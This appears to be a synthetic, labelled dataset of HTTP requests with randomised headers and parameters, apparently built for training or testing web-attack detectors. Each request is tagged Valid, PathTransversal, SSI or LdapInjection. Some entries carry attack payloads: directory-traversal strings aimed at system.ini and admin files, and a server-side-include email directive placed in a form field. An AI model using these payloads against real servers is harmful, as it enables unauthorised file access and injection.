GET /ottnba/tnge2.msf?haskkpHja=6251&qfQioLV=89&mhmrexhe=e0ZU6VS91HjZ&I8ltiehhrnqfebi=s6674oTsvTorurs&raatinmy=h4VM&zc9l48mrukip=302&9apRbtecho.Ohttpsw=5058714 HTTP/1.0
Host: www.iaeAaathor.gov:1
Connection: keep-alive
Accept: video/*;q=0.1
Accept-Charset: windows-1251;q=0.5, iso-8859-2, windows-1258, iso-8859-5;q=0.0, windows-1253
Accept-Encoding: compress, identity;q=0.9, identity
Accept-Language: ci-bkst;q=0.4, one-sti, qtHenOy-0o7hrm
Cache-Control: no-store
Client-ip: 132.237.22.38
Cookie: 3cafensseloiinl=ene;ATH7@nUgSgw5=xi=pbghdj5wga;ydrje8i=o
Cookie2: $Version="79"
Date: Thu, 26 Jun 08 24:43:12 UTC
ETag: "mHQJRk23s-H9cHk"
Expect: 100-continue
From: seoj@i7ntc.uk
If-Modified-Since: Wed, 24 Mar 10 08:16:46 GMT
If-Unmodified-Since: Thu, 20 Jul 06 19:30:45 CET
If-Match: "surWUK6wDX0hRzffg"
If-None-Match: *
If-Range: "QjKzP7Ps8UB5vpersxFY"
Max-Forwards: 0997
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM N2kzZG9obnRhY2llZWRDemRhYmhueGVlcmFsbnJjb2NjZW9ybW9uWXM=
Authorization: Basic RWdpZXd3b3o6cmJnaA==
Range: 322159-
Referer: /np9ehiie/daxen5i.fgf
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: Wlaope/6.9.5.8
UA-CPU: x86
UA-Disp: 353,6605,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8055x615
Via: mPnaL/5.9 108.199.100.46, FTP/3.9 www.ep4s.css
Transfer-Encoding: gzip
Upgrade: hAxb/7.4, nn6e/8.2, darha/5.2, 7oa/5.8
Warning: 322 9.218.91.57 "Efrfs" "Mon, 12 May 08 03:38:33 UTC"
X-Forwarded-For: 207.227.126.195
X-Serial-Number: 149051815209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29675
Start - Id: 14327
class: Valid
GET /tsmy.js?xcl9Le=o%3Atreee%3Ansee&0G=mrrgroup+bye&oturus=bekotaee7nhe4f2ty&dad=cmifncatnuE HTTP/1.1
Host: www.bTab8ls.de
Connection: piepm
Accept: */*
Accept-Charset: windows-1257, us-ascii, x-mac-roman, iso-8859-7, iso-8859-5
Accept-Encoding: 
Accept-Language: vt8Ya-sqinti2n;q=0.5
Cache-Control: no-transform
Client-ip: 173.106.192.151
Cookie: g1MRcv1=oTM0r6dGQJpg;eval1jmMxXuP=pranstQceE3srho;1e6ttsrkh=Tenwwuoulnii3ei;cQprllzi3deuait=rhsdeany
Cookie2: $Version="48"
Date: Mon, 24 May 04 22:32:55 UTC
ETag: "Xrde-JvqITgQdSr_"
Expect: 100-continue
From: hRagoz@mdeso9.st
If-Modified-Since: Wed, 02 Feb 05 03:51:46 UTC
If-Unmodified-Since: Mon, 17 Apr 06 03:08:15 GMT
If-Match: *
If-None-Match: *
If-Range: "ATLcsapt-3yojWslI4"
Max-Forwards: 3
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM M2F0cnQxOWhsaGVvb2ppYW4xd25JbGVubWZ1c0luZXhUNGxveXFpZHI5c29wdTY=
Authorization: Basic dG40YTkyaDphUGV3dG1p
Range: 44-41,-8,-787777
Referer: /wlnum/Xaras89s.conf
TE: gzip,trailers,trailers
Trailer: From
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 6.8; aa-h1; rv:4.6.2) Gecko/10649425
UA-CPU: MIPS
UA-Disp: 5219,163,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: 1.3 152.102.1.122, 7.0 www.iorSm.jpg, huuie/5.7 244.110.91.62
Transfer-Encoding: gzip
Upgrade: 9sii2/1.4
Warning: 869 www.s98uEo.css "er1dzcr" 
X-Forwarded-For: 131.202.186.153
X-Serial-Number: 04884664
----: -----------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 14327
Start - Id: 44652
class: PathTransversal
GET /inhutpdba/j8Qjxbex/ureeieclo/tAlUfzkUS@X7cMVX/d_usQdW3e61/5stsgenuruerforcnti/2kC8o6ownREq/geNvN/Edntwn/futYlnMURM2nl8Yp/varh.0N.msf?bohhn=qhhhidaan5it7&geotenrghmce=td&sswihagepxian4=qRafnrie&p9VK4boot.iniWMnullF=7&nelhxmpCooa9=31293&elIxmnaoisisac=samsp+tisve&EtcwnOoca5nm=e4no2+R5eUtsle&czjndQ=29542&EbmgdnsnaeweraS=406&i6snbceet=765640050&ct=basbody%7CAhrn&dhn=a%24Oe1of%29isieso%25&uu4dd=nssGb5vFzc HTTP/1.1
Host: 107.148.187.36
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, identity;q=0.7, gzip;q=0.7, identity, compress
Cache-Control: no-store
Client-ip: 107.160.82.102
Cookie: rcbvicitve=nY7sxntHooE
Date: Sun, 16 Nov 08 22:56:29 GMT
From: gtnncd@yhoqlnanrb.biz
If-Modified-Since: Tue, 08 Jun 04 21:48:19 CET
If-Unmodified-Since: Sat, 17 May 08 12:30:53 GMT
If-Range: "wA-socOr-VyMCsPg"
Referer: /zrcn7a/siadxt.html
User-Agent: ../../UBData/Members/members.grp%00

null

End - Id: 44652
Start - Id: 8305
class: Valid
GET /mail-r04xterm.n9script/4inFGxp_OrYHge0where/infraettbutbatHNthi/tFDhYEabyuHAfISL/iMSHzljw2@id/e6nPDEMpg@j-9P4i/wjq_7u2_q6Z0Kh/oLNHBGzc.E60.gif?o0Y4=68550&Eapt=ie&p0iots=i1k-db&hiobjectLqt=reeoandmgr%3Ci%24e+ooo+&ente=c+ HTTP/1.1
Host: www.tiddr.cz
Connection: isHrie
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish, x-mac-arabic
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 50.104.108.175
Cookie: r0ewcfVumiaIw=3~;patjLUswener=4;l34jHehshbhaOxr=0387;du=82811924
Cookie2: $Version="8"
Date: Sat, 24 Oct 09 07:54:08 CET
ETag: W/"A5BO3Cf4OYEWy7TaM"
Expect: t0nL67et=iedi9
From: aleoapbf@soer.net
If-Modified-Since: Mon, 15 May 06 04:05:03 UTC
If-Unmodified-Since: Sat, 22 Sep 07 18:21:50 GMT
If-Match: *
If-None-Match: *
If-Range: "ZxA-v7gLTCqK00SP"
Max-Forwards: 45
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: gnEJt tans=e5Re
Authorization: Digest response="48B0BE168EB1d56a3c6d53dBE7baDCF0"
Range: -8236,5-800
Referer: http://www.enodh.fr/tnda/6Chry/s5iahzf.jsp
TE: gzip,gzip
Trailer: If-Range
User-Agent: edladhc6neemmlhr
UA-CPU: x86
UA-Disp: 858,824,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 138x587
Via: FTP/8.7 www.rkLPc7nr.jpeg
Transfer-Encoding: gzip
Upgrade: rREn/2.9, di70e5/6.8, Oae/2.0, tCr/0.8, vn7low/5.7
Warning: 477 203.254.244.133:8 "Cspr5Osssgcfn" 
X-Forwarded-For: 12.15.116.132
X-Serial-Number: 7108869767908
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8305
Start - Id: 16478
class: Valid
GET /m7Wt/t5y2/6MX8FTOT_/yrlso/mnu/x353lY.LTBOhMi/n3/e8telse/eaEf/habaanws.png?styleGphpJSscriptY@8s=etcn%3ChrIn4tZttu&Nny9adminHcURG3=tdnsheeAnarSsane81 HTTP/1.0
Host: 119.176.110.72
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 238.57.27.138
Cookie: dYsyin3l0gM=nrdsAr9kun3o@c$der;3eentitmtsodt=5@
Cookie2: $Version="1"
Date: Wed, 23 May 07 21:05:21 UTC
ETag: W/"7ZIa@ypOpsN0Ej0_f"
Expect: 100-continue
From: enneeci@ehirrnmall.it
If-Modified-Since: Sat, 07 Mar 09 15:29:39 GMT
If-Unmodified-Since: Sun, 30 Apr 06 15:12:13 GMT
If-Match: "hnil.nI4lE1zUM53F_v"
If-None-Match: "5JNyOOXsSqIE1jrX5"
If-Range: "5oEp8CvexltzMBUhVu"
Max-Forwards: 2426
MIME-Version: 3.8
Pragma: 1onks='eh6sh'
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: NTLM ZDBldGFoYzlsdHRpZTlkaXRuc2d3cmVvemVockVxdEdn
Range: 367-465064
Referer: http://nird.fr/secwnO/haDNea/tazn/oiwa/hlxdw.cfm
TE: trailers,deflate
Trailer: Warning
User-Agent: Ddfeioifn/7.0.6
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 714x1442
Via: HTTP/1.0 www.mps3.html
Transfer-Encoding: identity
Upgrade: ry7ni/4.7, twhs/6.6, tDt/4.9, jtn/8.9, roho/9.5
Warning: 543 www.tjetzkwe.png "ctadem" "Wed, 01 Aug 07 06:58:08 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 764868889317962495
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 16478
Start - Id: 17040
class: Valid
GET /P9etc4YuH6T5g/u8rK/estEe/oneMi/rKWKwEKzvtivv/6ahuiqasatt/teNRwnFOzKzg/zso/bZlsVK/sTrEbtsEn/NgHekW0httpsTy.bIh/rc4anhaaian.exe? HTTP/1.1
Host: 140.229.237.11
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312;q=0.9, windows-1255;q=0.7, x-mac-cyrillic, x-mac-icelandic;q=0.5
Accept-Encoding: identity, deflate, identity;q=0.4
Accept-Language: bYall-0hdh;q=0.8, swpM-ueum;q=0.5, 3x-Is
Cache-Control: max-age=7
Client-ip: 48.28.28.132
Cookie: QooRraiv=653319;gCI15OWacceptkDM=44
Cookie2: $Version="8"
Date: Sat, 20 May 06 09:47:27 GMT
ETag: "1ifmyEr55rEAlGk"
Expect: 100-continue
From: 7Srcii@daigi.st
If-Modified-Since: Fri, 20 Jun 08 07:08:19 CET
If-Unmodified-Since: Sat, 05 Jun 04 12:35:02 UTC
If-Match: "qcbzCF3OTpYfsMG-IUW"
If-None-Match: "ykkJw.O94D3PAbWUI"
If-Range: Fri, 12 May 06 02:40:39 GMT
Max-Forwards: 9259
MIME-Version: 3.6
Pragma: lqeInot='sde'
Proxy-Authorization: etoT lefruaR=btta3nc
Authorization: Basic ZEVzbzhpOmZub3I=
Range: 10-568,367-
Referer: http://sH0oty.org/Ecttiw.swf
TE: chunked,trailers,gzip;q=0.8
Trailer: Accept
User-Agent: ehnDjisy/7.1.6.3
UA-CPU: PowerPC
UA-Disp: 7236,439,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 486x328
Via: zin3to/8.2 www.1lTnas8.css, 8.2 166.223.43.213
Transfer-Encoding: oTnb; ocua=lu4ay0h
Upgrade: an5e/3.9, ubn5/9.2, 1enCH/8.4, mcnh/6.1
Warning: 826 www.RyE2ueeh.gif "spansolD" "Sun, 02 Oct 05 08:18:17 UTC"
X-Forwarded-For: 146.223.240.130
X-Serial-Number: 88882390422538145
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17040
Start - Id: 7243
class: Valid
PUT /-bgJBjhaving-Uyz/taees0dgbwRhtdatrial/i@AconnectGperl/mPyiliC7nbIebkJ/Tbgsoundz6t/6k7omdd8moau2gmx/eLKaUv1W1V/nt8a.css? HTTP/1.0
Content-Length: 74
Content-Language: doi,4aetn,Ro
Content-Encoding: deflate
Content-Location: /2Ohl/booE.exe
Content-MD5: Uk5kbmNlYmRkdHo1bjJ3bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Jun 08 20:00:07 UTC
Last-Modified: Sun, 22 Jan 06 13:16:28 GMT
Host: 99.48.189.29:18576
Connection: cEr1s
Accept: audio/*, audio/basic, audio/basic;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: rthe6n-sihTua, 8taeuot-Gum, ri8r-gc, hck5hW5o-aedhti
Cache-Control: no-store
Client-ip: 131.8.80.19
Cookie: q8tytys= bodi6e2ird;arm=19594
Cookie2: $Version="8"
Date: Tue, 18 Dec 07 12:34:35 CET
ETag: "LSPiBQAuZEWmmlnvEFPd"
Expect: hindsed=oETreev
From: hmr2nw4d@stiimunlz6.cz
If-Modified-Since: Fri, 29 Apr 05 02:35:06 UTC
If-Unmodified-Since: Tue, 18 Nov 08 14:28:42 UTC
If-Match: "FKxwsBjv5wDvyfqVp4h"
If-None-Match: ".ctvCQrkaeI5xmza"
If-Range: "iCNlrxDJGpwftCCb"
Max-Forwards: 3
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic bnRkZVd2OnVpaE9Fc2Fu
Authorization: rrkhe sbXz66c=ahtx0n
Range: -805
Referer: /shpa9.mpg
TE: trailers,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: slLahfZW http://www.n8wn.de
UA-CPU: StrongARM
UA-Disp: 3266,331,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 629x010
Via: 7.2 8.83.242.226
Transfer-Encoding: deflate
Upgrade: l3se/5.2
Warning: 727 www.dnda.gif:0568 "si7of2abo8tgnymy" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: -----------------------------
~~~~~: ~~~~~~~~~~~

ieh=dropn$L&7ceRu0nea0=3mk&Itz=262024&Iou6so=dzP.i&rhhcbciU1ndn=oechoLmd

End - Id: 7243
Start - Id: 39172
class: SSI
PUT /a7nCt5uf/srtnB2e0GtOnFedrb34.pl? HTTP/1.0
Content-Length: 437
Content-Language: cia
Content-Encoding: identity
Content-Location: /ctnhEd2t/urtd9ot/pkgoblt/lhTu/iralr.bin
Content-MD5: M2VJYTlzNXRvdWU2aWRzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jan 04 23:44:08 CET
Last-Modified: Thu, 20 May 04 23:21:11 UTC
Host: www.Hoiassnkk.gov
Connection: keep-alive
Accept: application/x-tar, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: o1onee='hle'
Client-ip: 105.29.124.80
Cookie: EemIctl5Ipzynm=ntifsock_streamexecoyrTnwhereAe;ens=8715202;ssEsceaif=z4hwmet
Date: Sun, 13 Feb 05 09:01:19 GMT
If-Modified-Since: Fri, 04 May 07 22:08:20 CET
If-Unmodified-Since: Mon, 19 Dec 05 10:37:22 CET
If-None-Match: *
If-Range: "0FYnZXE9NSp2a@6OK6"
Max-Forwards: 779
MIME-Version: 3.6
Pragma: Orai='diiu2mDt'
Referer: /essnytm/bvEidix/oqh9ys/ivpeqph.jpg
Trailer: Trailer
User-Agent: Mozilla/7.4 (X11; U; Unix 6.6; He-hm; rv:4.0.8) Gecko/51036570
UA-Pixels: 466x9263
Via: FTP/6.2 www.eouus9nb.png, Eagc/6.2 71.228.144.120:29, FTP/8.0 102.112.204.211
~~~~~: ~~~~~~~~~~

wlba3=9051787&ffeseh5rm=32599&lio=8gcoqCU8eK&ieagXfsIyen=0179&wRnMe1nesrhemg=ycseToampgogtietr&betfNai=<!--#email fromhost="www.ke5hf3nn.com" tohost="mailbox.krg.com" message="r7n1 hxentb ytleHqh iurufN" fromaddress="RytSal.com" toaddress="9tseo.egsedt.com" subject="eIe" sender="eae.com" replyto="ednn0l.com" cc="ei15" inreplyto="pa Ett btdeg" id="aretfmail" -->

End - Id: 39172
Start - Id: 45974
class: PathTransversal
PUT /ore5icsifnahlOo/i1thf7/Osr/5TXWdxxml/a3VW5JxxVlXK3_-NNu/QoKOI/85OrY8_Te.@cCu/cGE4PGq.jFncJ6/MdaiOiiiemeaVt.nsf? HTTP/1.0
Content-Length: 52
Content-Language: m,sdee
Content-Encoding: gzip
Content-Location: /tapoe/naqtl5t/rdaxore/eiraoytm/worn.sh
Content-MD5: dXQyYWRudmNzZXhsdGNteg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Jun 06 05:55:50 CET
Last-Modified: Mon, 27 Apr 09 02:28:52 UTC
Host: www.sshoo.biz:31
Connection: nehlaean
Accept: application/x-tar;q=0.7, audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Cookie2: $Version="661"
Date: Wed, 23 Sep 09 22:14:58 UTC
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: rrenkaih
From: ubSynrd@jJdge.it
If-Modified-Since: Sat, 16 Oct 04 10:35:27 UTC
If-Unmodified-Since: Fri, 06 Jun 08 23:23:06 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 May 06 23:51:59 CET
Max-Forwards: 086
Pragma: o=im
Proxy-Authorization: Digest qop=furtk
Authorization: NTLM Zjd4cW5xcW9lT3RMYnRmRXQ1dGlvdDljaHR4S2VUcmVlbmVzbzBhbG5xYWE=
Referer: http://4uer.ch/qrvsxN/3zdes/mjazIa/eskya/nnsdbx.mp3
TE: trailers,chunked
Trailer: Authorization
User-Agent: ..\..\..\..\..\..\WINNT\system.ini
UA-CPU: StrongARM
UA-Color: color16
UA-Pixels: 548x253
Via: 4.0 www.3deabstf.css, 6.7 238.230.211.201, 9.5 www.Gotsi.shtml
Transfer-Encoding: gzip
Upgrade: fsoe/9.8, uwtd/5.6, pcsCta/5.2
Warning: 338 134.95.42.95 "lbocbuwzwise1Nry" 
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 41893725708385200236
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

NNp=t6services&he4tleaoz=a+arxehmnx44uoptnullihome

End - Id: 45974
Start - Id: 44926
class: PathTransversal
GET /lsBinElbCupdatex_uGqU.asmx?6aeiQNmCamh=zFvNkFOK1AU&Ia7=ef3s&686CXgE=i&connectXXSjnLI=eled&0wnRPdivMvHstdin=1576721&ensclrtara=ht4a&4kqurhh1whfz5nO=%27Ot8h%7C8iayl+erp&REjJkDN8S3tV=smEyrtscze2&tbesdM1dAtYceXp=2276395568&lesaoh=p%3BrbgsoundybetweenXe0r2d&st2c2otaesbtr=..%2F..%2F..%2Flaat%2Fadmin.txt&amhmehpdafeoIb=99761&u7lpSdehjpoa9=iy%27f&srwasoome=vjst HTTP/1.0
Host: www.enn6eea.ch
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew, shift_jis;q=0.3, iso-8859-9, x-mac-japanese, euc-cn
Accept-Encoding: *;q=0.3
Accept-Language: vSl-tfE5T;q=0.6
Cache-Control: lxeo3='edieraZ'
Client-ip: 156.228.249.233
Cookie: i7aco5=dKm9H;G5HyBdri7S=ocee<xrrek;oso5hseajlf=44505;UfD5x.divFu=eo?b
Cookie2: $Version="10"
Date: Fri, 04 Jul 08 01:31:38 UTC
ETag: "s3X2xyY4nbloQUM2pt6"
Expect: 100-continue
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Wed, 11 Aug 04 15:21:35 UTC
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: *
If-Range: Mon, 01 May 06 03:35:35 GMT
Max-Forwards: 8599
MIME-Version: 6.2
Pragma: 3iys5e='4jtl5'
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: Basic ZU5pcDpibmVzcA==
Range: 50635-77
Referer: http://www.chrubc.uk/uhthtde/urWIhi4/4hql/nrah/7NatFp.exe
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.1 (Windows; U; Win98 1.6; ai-we; rv:2.1.8) Gecko/39229293
UA-CPU: StrongARM
UA-Disp: 8119,252,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: HTTP/2.3 254.213.30.94, 4.8 www.Hwcseaho.gif
Transfer-Encoding: identity
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 627 www.luad.js "7atl" "Sun, 01 Jul 07 05:55:47 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44926
Start - Id: 25757
class: Valid
GET /vlFUDopeniyymM/eFjeGsroib/o82l1kgqdcw4flCmiH-z/nfTU47.Afes1kPsll/hosiuva/m1KAbNXFnqj7J-/tdeeeraspioceyeiizm/lT6/dysRO.js?inputRisy=oo%26B0a+enec&2iethenitcophem=lRBg4HPxUe&7ueerrtneean=tAeuihtpass%40pt7maileeinsertr3p8h&lvZnmn=h0rsohbd&Sniif793cd0=crlvmsodrei&eo5NYage1=ibxthoeooaaj&wT93as=v9AEq3&mPpblfu=19&tiqsed0Ctd5deUh=42655&eorsbHe=953841527 HTTP/1.1
Host: www.6ofhf.fr
Connection: sq3syL
Accept: audio/basic;q=0.8, text/html;q=0.8, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=9332
Client-ip: 231.14.230.156
Cookie: otstaeatv9xO5=obe;eu3ya=rnph-tazm qdihlAs;nanrazreocttros=008864;69=422
Cookie2: $Version="38"
Date: Fri, 12 Feb 10 21:42:15 UTC
ETag: W/"KyQq33LfhFPbLrP6"
Expect: 100-continue
From: Fisonn33@rmkNOgAs.ch
If-Modified-Since: Sun, 17 Feb 08 14:41:48 UTC
If-Unmodified-Since: Fri, 01 Dec 06 07:53:43 GMT
If-Match: *
If-None-Match: "bEHsdM-8UI75S2xiR"
If-Range: Mon, 25 Dec 06 06:56:14 UTC
Max-Forwards: 42
MIME-Version: 0.1
Pragma: hn='nauipb'
Proxy-Authorization: NTLM YXNTNjNlaG1hZWZmc2FDZTZhczR3aXJhNm13c25hYW9uaWlydGgza2Fz
Authorization: NTLM dGZoZW9hbWhueGQzenRudXdlZHNsdGxlZWJ0cnAzcmlhNWE=
Range: 0846-,55-
Referer: /4s2e.bin
TE: trailers
Trailer: Transfer-Encoding
User-Agent: eefaetlRi (eVb9SQvLa; hjWJMrC; tvSdxfG; umD@vep9)
UA-CPU: x86
UA-Disp: 281,591,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6588x200
Via: mr3/5.1 243.114.153.222, HTTP/9.8 www.oototsho.tiff, FTP/1.4 www.eakenBA.jpeg
Transfer-Encoding: compress
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 268 163.124.255.0 "nasf3oeerheogae" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 960628745817709
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25757
Start - Id: 33917
class: Valid
PUT /bkP@PDocuH/oDrauN00iw.jpg? HTTP/1.0
Content-Length: 55
Content-Language: 1enm3lh
Content-Encoding: gzip
Content-Location: http://www.h6nlaeia.it/asu4ndza/smbYetho/mnnse8/ze09fat/8hr4ossi.nsf
Content-MD5: U3V0YWltazhoc29lRzIzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 May 06 18:18:38 CET
Last-Modified: Thu, 07 Jun 07 23:50:55 GMT
Host: 134.26.146.80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: Gi3vrEpe-oT, lhe-ewoeie;q=0.8
Cache-Control: min-fresh=4
Client-ip: 247.151.53.3
Cookie: qyfs=Spasswdeejwsa%hchildar;Twindow.openBnk=2751
Cookie2: $Version="71"
Date: Thu, 15 Feb 07 23:14:48 GMT
ETag: "k8j2P@MWQ5XdVEu0GhY"
Expect: feoerhv
From: faUspl3@yqiAa4o.it
If-Modified-Since: Mon, 23 Jun 08 14:56:14 UTC
If-Unmodified-Since: Thu, 09 Sep 04 20:24:49 GMT
If-Match: "eZoSFdG5HjtpDm9XLf"
If-None-Match: *
If-Range: "nOhn2C80XAJ7pMjux"
Max-Forwards: 081
MIME-Version: 9.8
Pragma: da=ab5t
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: Basic M2ZyNGhwNmw6ZXNjcHJsb3A=
Range: -996,858-589875
Referer: http://sIfaeBL.uk/ihddh/jgrh/eytn/ioAhon/aa8d.wmn
TE: chunked;q=0.6
Trailer: Connection
User-Agent: gfeySoh
UA-CPU: Sparc
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1982x002
Via: od4Ety/8.5 www.Naotmao.css, FTP/8.0 www.pzehe.jpg, nha4oy/4.2 www.q4siadt.css:91
Transfer-Encoding: gzip
Upgrade: tiA/0.9, ntKsa/7.2, 7Aeetb/2.3, Eili/1.5, lni/0.9
Warning: 517 www.2utipo.html "0leet" 
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 346952667269
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

b6zgresc=nQbP1SVhr&V9Odelete0BmM0=n$t&nwl=bleS3yes1Tz

End - Id: 33917
Start - Id: 13885
class: Valid
GET /poraquhrhmEtptoBiO/T0nn4cmnbsbrdctr.cfm?CCwiMMaccess_logfAy=+ls%24t+n+edldq&d3oJEnigeemip=fvhW%4049Y5E&nioTdg9de85ysf=Ei+a%24c1%5D%5Da&riaTmfVMoqte=lullp+tautoexec&gLgXkS=42&zX31MD4o=tiNopeieNhistnm7&rlbhceAmlHoa=89294&rxAs=908605&K7d1=n6l&oretog9ipsne=69&@IjTICEformGjg=1hse&6sS4ll=Atas5E7jeh&SM1S=3V9-&rr8ptSs8iahae=5rT%40P HTTP/1.0
Host: www.BqeshyY56S.uk
Connection: keep-alive
Accept: audio/*, application/*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: iieAayno-go3;q=0.6, azR1mcf8-hSxNnuth;q=0.9, snsmyld-zbwd5wio;q=0.7, aceaNj2-d
Cache-Control: no-store
Client-ip: 174.37.26.127
Cookie: tHflgnhet0bw5t=72563;erfSOrncmSeh=sa
Cookie2: $Version="2"
Date: Fri, 09 Apr 10 01:47:19 CET
ETag: W/"UzkU53@-de6bwowOH7ON"
Expect: 9nws9ta=tbdzn
From: aopeat@lwiRaar.be
If-Modified-Since: Sun, 19 Apr 09 07:33:23 UTC
If-Unmodified-Since: Sat, 20 Nov 04 15:33:30 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 21 May 07 24:39:55 UTC
Max-Forwards: 44
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: 69sr aeSoonsr=ixten
Authorization: Basic dHVkb0U6YU13ZA==
Range: -52,788-774
Referer: /105imu3/trnnaee/nnTfoOhr/elreni2/jcSmes.rar
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: corl0UY5rv http://www.eyscraj.uk
UA-CPU: StrongARM
UA-Disp: 4060,2972,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7739x7906
Via: ngw/5.4 www.ktPi.shtml
Transfer-Encoding: eEeAur; nkhe=hicxooka
Upgrade: d3bfi/2.4, EhWrnN/9.4
Warning: 098 16.209.158.37 "jtcOeZythsytt9zaQlpa" "Sat, 23 Jul 05 18:39:08 GMT"
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13885
Start - Id: 23841
class: Valid
GET /7HKZOBscriptWJugR.php4? HTTP/1.1
Host: 182.203.101.51
Connection: keep-alive
Accept: text/html;q=0.8, image/*, video/*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 234.131.234.42
Cookie: geitOi=eYoestechild4e;dtfawhtrpMsa=mo1s2rxnTq8j>t0 ;epoy8tni2=rNnsI
Cookie2: $Version="6"
Date: Sun, 06 Mar 05 19:41:15 UTC
ETag: W/"dfqaqFIU1iKL1l_Ns"
Expect: 100-continue
From: iaaodun@atohoee.uk
If-Modified-Since: Mon, 17 Dec 07 06:55:01 GMT
If-Unmodified-Since: Wed, 14 Jan 09 02:38:22 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Feb 06 03:00:49 CET
Max-Forwards: 4991
MIME-Version: 8.7
Pragma: m=n
Proxy-Authorization: NTLM aWF2NExDcml1YW9TaTRhcGV5RXBlYXNpdGR1ZWQyZGFhYWlpN29nVGlT
Authorization: Digest cnonce="w4n7b"
Range: 241-54372,-12122,-63
Referer: /rdt7lvn.txt
TE: chunked,trailers
Trailer: From
User-Agent: tate (sczrS3y)
UA-CPU: PowerPC
UA-Disp: 5960,788,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1738x3451
Via: 2.5 www.sOatu.html
Transfer-Encoding: deflate
Upgrade: odi/2.0
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 119652447524751
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23841
Start - Id: 38898
class: LdapInjection
